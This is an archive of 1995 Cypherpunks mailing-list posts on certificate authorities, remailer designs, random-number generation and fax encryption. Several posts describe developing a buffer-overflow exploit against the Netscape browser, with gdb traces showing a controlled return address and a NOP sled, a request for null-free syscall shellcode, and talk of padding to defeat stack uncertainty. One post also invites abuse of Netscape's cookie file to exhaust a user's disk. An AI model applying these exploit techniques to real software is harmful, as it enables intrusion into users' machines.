bully pulpit In-Reply-To: <199509251741.KAA04656@infinity.c2.org> Message-ID: <44a7mr$jda@tera.mcom.com> In article <199509251741.KAA04656 at infinity.c2.org>, sameer at c2.org (sameer) writes: > The really big sticking point I see, however, is the > certification authorities. There is a single point of failure here and > that is at Verisign. This becomes a large problem I think if the en > rypted email that Netscape does requires personal x509 certificates (I > read that Versign is issuing those for $9/each.) This is a problem > because for one thing I don't think Versign will want to issue certs > to psudonyms, and Netscape may not talk encrypted email to > non-certified people. (I am not sure) I believe that the identies of free certificates that verisign plans to offer to netscape customers will not be checked in any way other than to ensure that the name is unique for that CA. You will have to ask someone from Verisign to get a certain answer. > The solution to this, of course, is to allow Navigator to > accept alternate certification hierarchies, so we can setup a > Cypherpunks cert agency or a c2.org cert agency, which -will- sign > nym's keys, etc. The question exists though, as to whether or not > Netscape will allow for alternate agencies in Navigator. I have stated here, and in other public forums, several times in the past few months, that Netscape Navigator 2.0 will support user configurable certificate authorities. You will be able to specify that you do or do not trust specific server certificates and certificate authorities. The user will be able to incorporate new CA certificates into their certificate database, and mark them as trusted for signing certs for SSL, email, etc. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From blancw at accessone.com Tue Sep 26 19:00:33 1995 From: blancw at accessone.com (blancw at accessone.com) Date: Tue, 26 Sep 95 19:00:33 PDT Subject: cypherpunks press releases/contact list: YES!! DO IT!! Message-ID: <9509270202.AA17457@accessone.com> From: "Perry E. Metzger" There is this widespread and wholely misplaced affection for "cypherpunks". We aren't a company or an organization. This is a mailing list, and occassionally a seminar series in places like NoCal. It isn't a "group". .............................................. And you of all the cpunks, Perry, are the most affectionately considered. :>) Actually, those who want to become official spokewheels should consider that the cypherpunk agenda is to promote anarchic (i.e. individualistic, self-responsible) action. That is, that the individual who chooses to act in a 'cypherpunkish' mode does so at their own risk by their own motivation by their own decision and their own discretion. Not everyone on the list subscribes to this ideal of complete independence; furthermore, for anarchist types to identify with a "group" would be inconsistent with the philosophical attitude of the "members", who come-&-go as they please. However, it would be an amazing event to see VZ Nuri-logical (Cypherpunk Extraordinaire) on TV, saying something like, "Yes, I fully and completely subscribe to the Cypherpunk agenda: black markets, anarchy, overthrow of governments. National borders are just speed bumps on the information superhighway." (It would be a *cold* day in Hell!) .. Blanc From rjc at clark.net Tue Sep 26 20:38:18 1995 From: rjc at clark.net (Ray Cromwell) Date: Tue, 26 Sep 95 20:38:18 PDT Subject: Status of Netscape Bug Exploit (suggestions needed) Message-ID: <199509270338.XAA09600@clark.net> Ok Folks, here's what I got so far... 1) a URL that can place a specific value in the program counter (gdb) select-frame 2 (gdb) info frame Stack level 2, frame at 0xefbfbc30: eip = 0xefbfbc30; saved eip 0x90909090 ^^^^^^^^^^^^^^^^ called by frame at 0x90909090, caller of frame at 0xefbfbc14 Arglist at 0xefbfbc30, args: Locals at 0xefbfbc30, Previous frame's sp is 0xefbfbc1c Saved registers: eax at 0xefbfbc2c, ecx at 0xefbfbc28, edx at 0xefbfbc24, ebx at 0xefbfbc20, ebp at 0xefbfbc18, esi at 0xefbfbc14, edi at 0xefbfbc10, eip at 0xefbfbc0c, ps at 0xefbfbc08 2) A piece of exploit code on the stack near the PC (gdb) disassemble 0xefbfbc10 0xefbfbc40 0xefbfbc27: nop 0xefbfbc28: nop 0xefbfbc29: nop 0xefbfbc2a: nop 0xefbfbc2b: nop 0xefbfbc2c: nop 0xefbfbc2d: nop 0xefbfbc2e: nop 0xefbfbc2f: nop 0xefbfbc30: nop 0xefbfbc31: nop 0xefbfbc32: nop 0xefbfbc33: nop 0xefbfbc34: nop 0xefbfbc35: nop 0xefbfbc36: nop 0xefbfbc37: nop 0xefbfbc38: nop 0xefbfbc39: nop 0xefbfbc3a: nop 0xefbfbc3b: nop 0xefbfbc3c: nop 0xefbfbc3d: nop 0xefbfbc3e: nop 0xefbfbc3f: nop 0xefbfbc40: nop 3) exploit code that calls the kernel syscall() with SYS_exit (benign exploit, causes your browser to exit) The problem? To make a syscall under BSDI2.0, I have to execute an lcall 0x7,0x0 with 1,0 on the stack. However, to exploit the netscape bug, you can not embed 0x0 in the URL. No problem I thought, I searched Netscape's executable for any kernel calls, and found an lcall 0x7,0x0 at 0x257fee. But I can't do a 32-bit direct jump without a zero, in the instruction (the 32-bit address is 0x00257fee), and I can't do a relative jump from 0xefbfbc30+ If you can come up with some 386 assembly under BSDI2.0 which can invoke syscall() in the kernel without any embeded 0x0 bytes in the code, you can share a Hack Netscape T-Shirt with me. If it turns out to be too hard under BSDI, I'll gladly assist in producing exploits for Windows or another operating system. One trick I thought up for embeding zeros in the code is to self-modify the code using XOR ADDRESS,ADDRESS where ADDRESS is a byte on the stack within the code. Anyone have any better ones? -Ray From nobody at armadillo.com Tue Sep 26 21:02:15 1995 From: nobody at armadillo.com (Anonymous Remailing Service) Date: Tue, 26 Sep 95 21:02:15 PDT Subject: Time Keys, Some Secure Ideas (by Alias: Jay Hyden) Message-ID: <199509270256.VAA09199@monad.armadillo.com> -----BEGIN PGP SIGNED MESSAGE----- >> Time Keys, Some Secure Ideas << The weakest attack on a time key based system is to spoof the computer that keeps track of time into releasing encryption keys i.e. change the clock. Perhaps this could be avoided by hardware inaccessability, say a computer system taken to, and setup on the Moon by those corporation that are already planning to place VR rovers on the lunar surface. Any Earth bound system would be vulnerable to physical attack. Here are some ideas for such a system: o 7 clocks with absolutely no way of reseting them. Perhaps a system that will only let you tell it which clock is the most accurate, and only if you prove you are the proper authority and only if 4 other clocks are on the same minute. o Redundant hardware and power collection and data transmit /receive systems, flash ROM hard drives for storing secret keys and neccesary programs and files. Built to last several centuries if possible. o Key pairs could be generated on Earth, a time of release instruction and perhaps an optional other public key a (return at future date encrypted with this key option.) The package is then encrypted with one of the lunar systems keys, then transmited to the Moon. A verification could be encypted and sent back to insure data integrity. o Other security checks in place would insure that the data was transmited to the Moon by the proper authority, i.e. the Corp. charging for this service. Additional backup logic that would insure that proper power and protocol exist for transmitions from the lunar system. o The key pairs are witness generated, then sent to the lunar system, then the secret key is destroyed on Earth. The public keys become a one way hash to the future until the time designated by the key's owner has elapsed. Then the lunar system would transmit the owners secret key to Earth. o Upon time released instructions the lunar system would transmit the secret key, (encrypted if optioned) upon demand by a known packet radio method. So if the Corp. authority did not exist in say, 100 years, the data could still be retrieved by standard packet radio. People who want to write to ONLY their great great grand- children or the future world in general would have a forum. Jay /"""""\ ~~ ,--------------------------------------------, ~~ /"""""\ /__ - _-\ ~~ ( End HEMP Prohibition! This is an open chal- ) ~~ /-_ - __\ :@ (*)~(*) ~ ( lenge to Historians. Name examples of where ) ~ (*)~(*) @: :%/--~ ))~: ~ (& when the cultivation of legal hemp was harm-) ~ :~(( ~--/%: \__"-==-===* ( ful or destructive to a society in any way! ) *===-==-"__/ (:"\_)_/ ( PublicKey on Servers) \_(_/":) .//:%:%:\. '---------------------------------------------' ./:%:%:\\. =000o====o000===================================================000o====o000= | | | | | | | | | | | - ----------------------------------------------------------------------------- | | | | | | | | | | | | - ----------------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGiLha7iRhcfEZiZAQEn0QP6A8cUmI0MHs866Mu/Ao4mFqr89F8tT3oP KeafNdSWJt8/pOlVZzQxV8P8S8dCkXwBgJJQaQ6tigqtD2+9fK1HEaWi3ZBAVgB+ CwLhqouwds2A5+l9riQfqAT+4yrSbeNR+bH3xyYa8zZSTzp5DB1tJEbWls6Kjr/w hxmFYrf6oSk= =oHrR -----END PGP SIGNATURE----- From rrothenb at ic.sunysb.edu Tue Sep 26 21:09:20 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Tue, 26 Sep 95 21:09:20 PDT Subject: PGP and FBI? Message-ID: <199509270409.AAA00688@libws4.ic.sunysb.edu> There's some sort of documentary on WBAI 99.5 FM out of NYC now. They're talking about PGP and right wing militias... the guy being interviewed called PGP a "one time pad system" and doesn't understand it... *sigh* From scmayo at rschp2.anu.edu.au Tue Sep 26 21:23:28 1995 From: scmayo at rschp2.anu.edu.au (Sherry Mayo) Date: Tue, 26 Sep 95 21:23:28 PDT Subject: chaos cryptography Message-ID: <9509270423.AA03675@toad.com> Hi all - saw this in New Scientist and thought you might be interested (I guess it's more stenography than cryptography): ========== "Secret signals hidden in chaos ...John Hogan of the Engineering Mathematics department at Bristol showed the BA how such unpredictable systems can be used to protect sensitive information. His team mixed the information with chaotic electrical signals, transmitted the result, and then extracted the hidden message. Hogan and his team modified simple electrical circuits to generate unpredictable signals and hid within them a recording of "Land of Hope and Glory". When the two identical circuits are connected, said Hogan, the outputs instantly synchronise so that anything added to the transmission stands out. "It's like magic." he said. If anyone intercepted the signal and fed it through a loudspeaker all they would hear is a loud hiss. This makes the system suitable for hiding confidential information - once, that is, the system is perfected. At present, a decoded message sounds like a scratchy 78 recording although it is still recognisable, said Hogan. So far the researchers have succeeded only when the two circuits are connected by wire a few cm long. They are now trying to replicate the results in circuits that are seperated by long distances and connected by a radio link. They also want to see if it can be modified for use with digital equipment." ============ Sherry ps I wonder how close to real noise the "hiss" is. From grafolog at netcom.com Tue Sep 26 21:47:49 1995 From: grafolog at netcom.com (Jonathan Blake) Date: Tue, 26 Sep 95 21:47:49 PDT Subject: Fax encryption software Message-ID: I saw this article in alt.privacy. Anybody think the described encryption actually is worth looking at. Xref: netcom.com alt.privacy:29325 Path: netcom.com!ix.netcom.com!howland.reston.ans.net!EU.net!uunet!in2.uu.net!news.deltanet.com!lkf0166 From: clav at deltanet.com Newsgroups: alt.privacy Subject: Re: FAX Encryption Software Date: Mon, 18 Sep 95 12:39:53 GMT Organization: Delta Internet Services, Anaheim, CA Lines: 59 Message-ID: <43k3nv$m9 at news1.deltanet.com> References: <43hvft$n2b at news1.deltanet.com> <43ii1t$210 at nntp.crl.com> NNTP-Posting-Host: lkf0166.deltanet.com X-Newsreader: News Xpress Version 1.0 Beta #3 Dear Mr. Chaos, We are talking about a 72 bit engine that is more than sufficiently strong for time sensitive general business purposes. In addition it does not rely merely on simple factoring but a process called graphical encryption that adds additional difficulty to an attack. I would like to see if your cracking abilities are anywhere near your abilities to return an uninformed answer. I invite you to try your skill. David _________________________________________________________________ _____________ In article <43ii1t$210 at nntp.crl.com>, acollier at crl.com wrote: >clav at deltanet.com wrote: > >>ANYONE FOR A CRYPTO-STRONG, YET EASY TO USE FAX/EMAIL SECURITY >>SOFTWARE PACKAGE FOR BUSINESS OR OTHER USE??? > >>Aliroo Ltd. has developed a Windows, eye-to-eye fax/email >>encryption package called PrivaSoft. > >>Unlike any previously devised system, this method protects, with >>only 4 mouse clicks, fax and email transmissions in electronic >>and even paper form - FROM THE TIME YOU CREATE A MESSAGE UNTIL IT >>IS READ - NOT JUST WHEN YOUR FAX IS BEING TRANSMITTED. > >>You can encrypt a message, and then fax or email it (via plain >>old standard fax machine or fax modem), print it to paper or save >>to a disk file. > >>It is fully licensed, without restriction for export, by the U.S. >>Department of Commerce. NO PGP WORRIES. > >Also no worries about security - if DOC says you can have it, you can bet >that NSA has seen to it that it is cryptographically weak, or else uses a >key escrow system (where sombody else can get to the keys), and as insecure >as any other non-published method. For all we know, they may be using a >cereal box decoder ring set up. > >>Email me for a free copy which will be sent to you via email or >>snail mail post. It is fully functional (not crippleware) and >>enables you to try our system out before purchase with 8 free >>page scrambles. It retails for $130 per installed computer. >>Looking for end users and distributors. > >>Thanks, >>David > > -- To subscribe to Graphology-L send e-mail to: listserv at netcom.com / subject: leave blank message: subscribe graphology-l at netcom.com To get the Graphology-L FAQ send e-mail to grafolog at netcom.com / subject: hwafaq / no message ^ From jcaldwel at iquest.net Tue Sep 26 22:17:27 1995 From: jcaldwel at iquest.net (James Caldwell) Date: Tue, 26 Sep 95 22:17:27 PDT Subject: Yet Another Alarmist TV Show About Child Molesters on the Ne Message-ID: On 25 Sep 95 at 0:06, Hroller Anonymous Remailer wrote: It's called the Hegelian Diclectic(sp?) first postulated by William Hegel (an ass) in Germany approx the 1600's as a method for social change when none could otherwise be achieved. > And the trashing will continue. It is the classic scenario. > Feed the media negative press clips about the entity you wish > to discredit (here, the Net), e.g.: > 1. All those pedophiles out to lure your children; > 2. Big coverage on catching some of those pedophiles; > 3. First page coverage on breaking Netscape's code with the > headlines that your sensitive information such as your > credit card numbers, etc. can be retrieved (ignoring that > the reason was to show Netscape's poorly structered code > would allow this and, therefore, preventing it before it > could happen); > 4. Expect cryptology to crop up in the Oklahoma bombing trial. > There already has been articles of those involved having > allegedly used that *damned* Net to correspond. From tcmay at got.net Tue Sep 26 22:32:35 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 26 Sep 95 22:32:35 PDT Subject: chaos cryptography Message-ID: >Hi all - saw this in New Scientist and thought you might be interested >(I guess it's more stenography than cryptography): ^^^^^^^^^^^ Yes, chaotic communication is preferred by secretaries around the world. They follow their dictates. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From inglem at adnetsol.com Tue Sep 26 22:53:38 1995 From: inglem at adnetsol.com (Mike Ingle) Date: Tue, 26 Sep 95 22:53:38 PDT Subject: Coercion-proof remailers (solved?) Message-ID: <199509270552.WAA00475@cryptical.adnetsol.com> For a while I've been talking about the importance of a robust infrastructure for anonymity, including coercion-resistant remailers. Here is an approach that appears to eliminate the problem of after-the-fact coercion. Existing remailers chain messages by using a fixed public/secret key pair in each remailer. This leaves them open to after-the-fact compromise from the sender end. If you capture a message as the sender sends it, you can later get the key of the first remailer, and decrypt the first layer. You can then proceed on down the line to the recipient. This creates a motive for an attacker to coerce remailers, and it means the value of the remailers' keys continually increase as more messages are sent. Instead of using a fixed key, the sender can perform a Diffie-Hellman exchange with the recipient at each point in a message's passage. This eliminates the coercion problem, since there is no permanent key to steal, but allows a corrupt remailer to see where the message is going. If the first remailer is corrupt, the whole path is compromised. The next step is to make sure there is no first remailer. The sender S generates a message and header requesting mailing S to the recipient R. The sender splits it into two pieces using / \ a method that requires both pieces to recover any data. Then he 1 2 adds a header to each piece requesting remailing to remailer 3. \ / He sends one piece to remailer 1 and one piece to remailer 2. 3 The transmissions are protected by DH exchange and encryption. | Remailers 1 and 2 each send their pieces to remailer 3. These R transmissions are also protected by DH exchanges. Remailer 3 combines the two pieces, recovers the header requesting remailing to R, and sends the recovered message to R. This approach is secure against after-the-fact coercion or key theft, because there is no persistent key to recover. It is also secure against any one of the three remailers being corrupt. If 3 is corrupt, it sees both pieces as it combines them, and knows they came from 1 and 2, but does not know where 1 and 2 got them from. If 1 is corrupt, it knows that a message from S went to 3, but it has only half of the split message, so it can't find out where 3 sent it to. If any two of the three are corrupt, the path is exposed. It is possible to add more levels. This one uses seven remailers, /S\ and can survive any two being corrupt. Some questions I don't / | | \ know the answers to: What is the best possible arrangement of 1 2 3 4 remailers, so that the highest percentage of them have to be \ / \ / corrupt before the path is revealed? If any continuous line 5 6 from S to R is corrupt, the path is revealed. And if any two \ / remailers in a 'triangle' are corrupt, the whole triangle is 7 corrupt. For example, 1 and 2, 1 and 5, or 2 and 5. | Is there a better arrangement, reusing some remailers, that R allows the message to remain secure with a higher number of corrupt remailers in the path? Mike From perry at piermont.com Tue Sep 26 22:54:18 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 26 Sep 95 22:54:18 PDT Subject: Yet Another Alarmist TV Show About Child Molesters on the Ne In-Reply-To: Message-ID: <199509270554.BAA17087@frankenstein.piermont.com> Thats the weirdest statement about the dialectic I've ever heard -- it bears no resemblance to what the man was talking about whatsoever. Hegel was discussing a theory of how historical changes occur, not suggesting a way to achieve change. You also have his dates wrong -- 200 years too early. The comment also had nothing whatsoever to do with the topic of this mailing list. .pm "James Caldwell" writes: > On 25 Sep 95 at 0:06, Hroller Anonymous Remailer wrote: > > It's called the Hegelian Diclectic(sp?) first postulated by William > Hegel (an ass) in Germany approx the 1600's as a method for social change > when none could otherwise be achieved. > > > And the trashing will continue. It is the classic scenario. > > Feed the media negative press clips about the entity you wish > > to discredit (here, the Net), e.g.: > > 1. All those pedophiles out to lure your children; > > 2. Big coverage on catching some of those pedophiles; > > 3. First page coverage on breaking Netscape's code with the > > headlines that your sensitive information such as your > > credit card numbers, etc. can be retrieved (ignoring that > > the reason was to show Netscape's poorly structered code > > would allow this and, therefore, preventing it before it > > could happen); > > 4. Expect cryptology to crop up in the Oklahoma bombing trial. > > There already has been articles of those involved having > > allegedly used that *damned* Net to correspond. > > From jamesd at echeque.com Tue Sep 26 23:16:32 1995 From: jamesd at echeque.com (James A. Donald) Date: Tue, 26 Sep 95 23:16:32 PDT Subject: Fax encryption software Message-ID: <199509270616.XAA16763@blob.best.net> At 09:34 PM 9/26/95 -0700, Jonathan Blake wrote: > > I saw this article in alt.privacy. > > Anybody think the described encryption actually is worth > looking at. > > We are talking about a 72 bit engine that is more than > sufficiently strong for time sensitive general business purposes. Since David does not know the difference between CPU word width and an encryption algorithm, I think it is safe to ignore him. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From rjc at clark.net Tue Sep 26 23:19:34 1995 From: rjc at clark.net (Ray Cromwell) Date: Tue, 26 Sep 95 23:19:34 PDT Subject: Wild Idea for RNG Message-ID: <199509270619.CAA11744@clark.net> Ok, so I'm reading a message somewhere and I see a message about algorithmic information theory. Cryptography was recently on my mind and I thought of Chaitin's quote "arithmetic is random" So, why not construct a turing machine with a large state transition table, input a random program, and get a 1 or 0 bit depending on whether it halts in X number of cycles. You could even get more than 1 bit out of it by measuring how many cycles it takes to halt (if it halts before X) and use the LSB. Is it as secure as the halting problem? (intractable to devise an algorithm used to predict a bit with more than 50% confidence if you knew the state table?) Ok, so it's impractical. So how about this: Grab a picture of the current bitmap on your screen. Run it through a good compression algorithm (say, an arithmetic/Q-coder or one of the LZ schemes). Grab the LSB of every 4th byte or so. If the screen is size 1024*768*8, that's 786432 bytes. Let's assume a 10 to 1 compression ratio = 78643 bytes. Let's assume you take 1 bit from every 10 byte, that's 983 bits of entropy. The screen will often contain data like: random placement of icons and windows current time current applications running, and the data in their windows If Netscape was running for instance, part of the random bits would come from the bitmap representation of the data in Netscape's window which would depend on the URL being displayed. -Ray From don at cs.byu.edu Tue Sep 26 23:22:02 1995 From: don at cs.byu.edu (Donald M. Kitchen) Date: Tue, 26 Sep 95 23:22:02 PDT Subject: Windows MixMaster Client In-Reply-To: <00996F95DAD78CE0.0000381E@sanchez.com> Message-ID: <199509270632.AAA01325@zeezrom.cs.byu.edu> > Does anyone out there have a windows mixmaster client? (or a pointer to one?) There are none. > Also, I am having a LOT of grief trying to get the alpha.c2.org remailer to > work for me... (yes, I have the help files) > Could someone walk me through it? You mean the nym server at alpha.c2.org? It seems to have about a 1 week delay on it... Be sure the reply block that you give it is your own, and that you tell alpha which remailer the reply block goes to. Don From rjc at clark.net Tue Sep 26 23:26:40 1995 From: rjc at clark.net (Ray Cromwell) Date: Tue, 26 Sep 95 23:26:40 PDT Subject: Coercion-proof remailers (solved?) In-Reply-To: <199509270552.WAA00475@cryptical.adnetsol.com> Message-ID: <199509270626.CAA13654@clark.net> This idea is similar to an approach I posted a month or so ago entitled "anonymous name resolution" which uses shamir sharing to break up the recipient's address so that there is no first remailer to coerce. The idea is that you should not deliver to e-mail addresses on the remailer network, but to "handles", these handles will be distributed across a DNS-like system that splits up the handles using shamir sharing. No server stores the handle->email mapping, but the whole network can perform the mapping. Remailers don't deliver the message to the final destination, but deliver pieces of the message to the anonymous name resolver network which perform the final delivery. -Ray From frogfarm at yakko.cs.wmich.edu Wed Sep 27 00:12:22 1995 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Wed, 27 Sep 95 00:12:22 PDT Subject: Cypherpunks Lite In-Reply-To: <199509262133.OAA21492@comsec.com> Message-ID: <199509270704.DAA10591@yakko.cs.wmich.edu> Eric Blossom writes: > I provide a moderated version of the Cypherpunks list called > "Cypherpunks Lite".[...] I offer a similar service, with the following provisos: o There's no fee (unless you want to donate ecash) o No digest format available o Approximately the same statistics as Cpunks Lite (5-10% of all incoming messages, depending on content) o No archives of previous mailings available for public review to aid in consumer choice I call it "Cpunks Frog Forwards". To be added or removed, send a polite request to the human behind this address. -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information To be a skeptic is to refuse to be a victim. "This is my .sig. There are many like it, but this one is mine." Freedom...yeah, right. From stewarts at ix.netcom.com Wed Sep 27 00:36:08 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 27 Sep 95 00:36:08 PDT Subject: Hack Microsoft At Work Fax? Message-ID: <199509270735.AAA23328@ix5.ix.netcom.com> I've been helping a client install Microsoft Windows for Workgroups, which comes with Microsoft At Work Fax. The fax software, in addition to doing normal stuff, lets you encrypt faxes with passwords or public-key encryption for sending to other people who use the same software. The manual has minimal technical information, so I don't know the algorithms it uses; it mostly talks about what GUI buttons to push. I was hoping the section on taking your software overseas would say something about Export Laws and International Arms Traffickin' (and creatin' a disturbance...) but all it said was how to set the international-direct-dialing phone codes so you can get your fax to go where you want. Because of that, I'm guessing it's something like RC4/40 and RSA-512 with some sort of user name as part of the public key field, but I'd like to know more, and I'm also guessing that they've got some sort of general export license permission from the Feds. The public-key system uses a public key file with "154 computer-generated characters", and recommends exchanging public keys by floppy disk. I don't know if that's 154*8 bits, or 154*6 or *4, or if there's a user-name string using up some of those characters; probably the latter since it's probably 512 bits because of export. I called the usually helpful Microsoft Technical Support phone number, and they were friendly and will try to get back to me, but this is way out of the scope of the kind of questions they're used to :-) And the stuff I could find from the Web page or ftp.microsoft.com on encryption had less than the manual, plus some stuff on password encryption, plus some stuff on their RAS remote network access stuff which apparently uses DES as well as standard PPP handshaking or Shiva handshaking. Does anybody have any more information? It'd be fun to hit up Microsoft for the next crack if it's weak enough; the fax stuff can also be sent by MSMail so there is eavesdropping potential. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From jsw at netscape.com Wed Sep 27 00:45:16 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Wed, 27 Sep 95 00:45:16 PDT Subject: netscape NSRANDFILE compatible with /dev/random ? In-Reply-To: Message-ID: <9509270040.ZM150@tofuhut> On Sep 27, 8:32am, Frank A Stevenson wrote: > Subject: netscape NSRANDFILE compatible with /dev/random ? > > What happens if NSRANDFILE is set to /dev/random ? > will netscape try to read an infinite number of random bytes ? In the current patch it will read up to 1 megabyte before stopping. In 2.0 I will add a way to specify a size. As a temporary hack you could use 'dd' to get the number of bytes you want into a file, then remove the file once netscape had started up. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From frank at funcom.no Wed Sep 27 00:50:40 1995 From: frank at funcom.no (Frank A Stevenson) Date: Wed, 27 Sep 95 00:50:40 PDT Subject: netscape NSRANDFILE compatible with /dev/random ? In-Reply-To: <9509261428.ZM150@tofuhut> Message-ID: What happens if NSRANDFILE is set to /dev/random ? will netscape try to read an infinite number of random bytes ? > ... > do it. Instead of reading ~/.pgp/randseed.bin, we now get the name > of a file from the environment variable NSRANDFILE, and pass that > file's contents throught the RNG seed hash. If you decide that its > safe, you can set the env variable to point to your randseed.bin file, > or any other file of random bits you care to use. > ... > Netscape Communication Corporation > jsw at netscape.com - http://home.netscape.com/people/jsw > Any opinions expressed above are mine. Frank From aleph1 at dfw.net Wed Sep 27 00:50:58 1995 From: aleph1 at dfw.net (Aleph One) Date: Wed, 27 Sep 95 00:50:58 PDT Subject: getting netscape to support the remailers In-Reply-To: <199509261957.MAA20143@infinity.c2.org> Message-ID: As far I can tell from netscapes web pages and the java mailing lists there only way to add to the runtime is with DLL's. Jave is only being used for applets. And whatever they may say their scripting language is not Java. (An engineer at Sun that worked on getting Java to work for Netscape said that Sun had nothing to do with that half cooked scripting language). I for once can wait till HotJava is more stable. You can modify it at your hearths content. And learning Java is easy enough. Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 On Tue, 26 Sep 1995, sameer wrote: > That was what I was thinking as well. I am confused by > Netscape's java support though.. I haven't seen very many details. Is > netscape going to only support applets or can you add stuff to the > runtime as well? In order to use jcrypt one needs access to add stuff > to the runtime I beleive. > From aleph1 at dfw.net Wed Sep 27 01:21:32 1995 From: aleph1 at dfw.net (Aleph One) Date: Wed, 27 Sep 95 01:21:32 PDT Subject: [NOISE] Re: Easter Eggs In-Reply-To: <199509261959.MAA28501@desiree.teleport.com> Message-ID: Actually there is a limit of 20 cokies per web server. I will have to check to see if there is a limit on the size of the cookie. And no you dont need a Netscape server. Its just another HTTP header. What about this: downloading a encoded picture contating graphic description of sex with minors. Would the FBI go around checking peoples cookie files and busting them? Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 On Tue, 26 Sep 1995, Alan Olsen wrote: > obNetscapeHack: There is a feature called a "cookie file" in Netscape that > is ripe for exploitation as a security leak. If you are using a Netscape > server (and you may not even need that), you can feed all sorts of > information into it without the user's knowlege. I have heard of one page > that overloads the cookie file until the machine runs out of drive space. I > am sure that there are other exploitable holes there... Any takers? From anonymous-remailer at shell.portal.com Wed Sep 27 01:49:30 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 27 Sep 95 01:49:30 PDT Subject: testab Message-ID: <199509270848.BAA14286@jobe.shell.portal.com> testab From anonymous-remailer at shell.portal.com Wed Sep 27 01:50:57 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 27 Sep 95 01:50:57 PDT Subject: testab Message-ID: <199509270849.BAA14441@jobe.shell.portal.com> testab From cwe at it.kth.se Wed Sep 27 02:15:13 1995 From: cwe at it.kth.se (Christian Wettergren) Date: Wed, 27 Sep 95 02:15:13 PDT Subject: Exchange random numbers (was: Re: netscape's response) In-Reply-To: <199509252031.NAA15134@quito.CS.Berkeley.EDU> Message-ID: <199509270913.KAA17943@piraya.electrum.kth.se> | > Giving out contribution: | > MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote | > Taking in contribution : | > my_seed = my_seed XOR | > ((select_low_bits(remote_contrib, contrib_width) << contrib_area) | > | | People seem to think this kind of thing is obviously safe. I'm not yet | convinced. Well, I'm not either, actually. But I think this might be better than the current state of affairs, where every bit of your seed is almost guessable. And it might also be an intermediate solution until there is a good random seed hardware generator in every computer. | By xoring in a quantity *chosen by your adversary*, you're essentially | allowing related-key attacks on your stream cipher. (Your PRNG is just | a stream cipher, keyed with my_seed.) I think you mustn't allow the any external partner to "contribute" at a known and/or chosen offset into the buffer. You mustn't either accept "too much" contribution. | Noone knows how secure most ciphers are against related-key attacks: | related-key attacks are known to be very powerful (often more powerful | than any other type); but very little research on this topic is available. | You're treading on unknown ground. Yes. But I wonder whether this isn't really about the battle between "the pragmatists" vs "the purists" point of view wrt security? I see so many very unsophisticated attacks out there that a related-key attack, although possible and powerful, still is rather unlikely. Could you quantify how powerful a related-key attack is, compared to some other kind of attack? I don't know anything about this kind of attack, do you have any references? | There's the also a small error in your specific algorithm. Let | n = stop_bit - start_bit; | presumably n is much less than the length of your seed. Then a brute-force | search over n bits will recover n bits of the seed -- this is a much faster | cryptanalysis than a brute force over all bits of the seed. This can | probably be fixed by something like | MD5(select_bits(MD5(my_seed))) -> remote, | but the related-key uncertainties still remain. Ok, noted. Maybe I should try to write down this "idea" for a proper review? Hmmm. /Christian From rjc at clark.net Wed Sep 27 02:21:27 1995 From: rjc at clark.net (Ray Cromwell) Date: Wed, 27 Sep 95 02:21:27 PDT Subject: WSJ on Netscape Hole 3 In-Reply-To: <199509260102.NAA09663@bats.comp.vuw.ac.nz> Message-ID: <199509270920.FAA19713@clark.net> Matthew Sheppard writes: > sameer writes: > > He's -asking- for an exploit. Tshirts to Ray and the person who > > does the exploit, if it gets written. Maybe I should just ring up 8lgm and > > have them do one. > > It isn't simple, you need to know the absolute address of where the > supplied code will be and alter the return address on the stack to > that address. > With Netscape 1.1 the state of the stack is much more dynamic, in > particular the user can be viewing documents at an arbitary depth in > the "web tree", each recursion will increase the stack pointer (or > decrease with some architectures) There is no way of knowing for > certain where you code will end up and thus no way to reliably alter > the return address on the stack to execute your arbitary code. Are you sure that Netscape uses an implicit stack for this, rather than an explicit stack? If they use an explicit stack for the "web tree", than your argument doesn't apply. In fact, I guess that they do use an explicit stack, because it makes implementing the "History" menu which shows the last couple of links much easier. I guess that they use some sort of "ring" structure which is a dequeue or plain array, so that after a certain "depth", states are written over and "scrolled off" Also, if they used an implicit stack, all it would do is increase the uncertainty of where the stack pointer is. However, by inserting enough NOPs into the exploit code, you can virtually insure the exploit code will be executed. Even if you are off by 64kbytes, you can insert 64kbytes of nops which isn't much. My own testing doesn't bear out your theory. I rarely changed the position of the overflowed stack frame by more than 200 (after following 3 nested links to my exploit link). I included 256-512 nops before my exploit code. > You could always gamble on popular states, like when the first url > fetched by the browser. Also you could direct execution to any > routine in the netscape binary (with unknown arguments) . The most > detrimental offhand would be deleting the bookmarks file (whoopee) And > with Netscape 2 comming RSN I wouldn't waste too much time. How about creating a 